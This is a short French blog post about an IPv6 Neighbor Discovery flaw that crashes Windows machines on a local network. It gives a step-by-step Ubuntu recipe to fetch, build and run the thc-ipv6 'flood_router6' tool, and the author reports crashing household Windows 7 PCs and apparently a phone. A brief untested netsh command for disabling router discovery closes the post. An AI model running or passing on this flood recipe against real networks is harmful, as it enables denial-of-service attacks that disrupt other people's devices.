Une nouvelle faille de sécurité vient d'être découverte dans le protocole Neighbor Discovery d'IPv6. Elle permet de faire planter, à distance, toutes les machines Windows (version XP, Vista, Seven, Server 2003 et 2008) d'un réseau. Certains équipements Cisco et 3DM sont également impactés.
L'exploitation de cette faille est plutôt simple, surtout si l'on se sert de l'utilitaire flood_router6 présent dans le logiciel Thc-ipv6.
Voici un exemple d'utilisation sous Ubuntu :
sudo apt-get install libpcap0.8-dev libssl-dev
wget http://freeworld.thc.org/releases/thc-ipv6-1.4.tar.gz
tar zxvf thc-ipv6-*.tar.gz && rm -f thc-ipv6-*.tar.gz
cd thc-ipv6-*
make
sudo ./flood_router6 eth0
Chez moi, tous les Windows 7 ont planté. Mais pire encore, l'iPhone de ma copine semble également avoir été touché (plantage du téléphone alors qu'elle jouait à un jeu...).
Les machines Linux ont parfaitement résisté pour une fois. Pour les systèmes Windows, la seule parade à cette attaque est de mettre à jour votre machine ou de désactiver IPv6.
La commande MS-DOS suivante doit le permettre (non testée) :
netsh interface ipv6 set interface "Local Area Connection" routerdiscovery=disabled
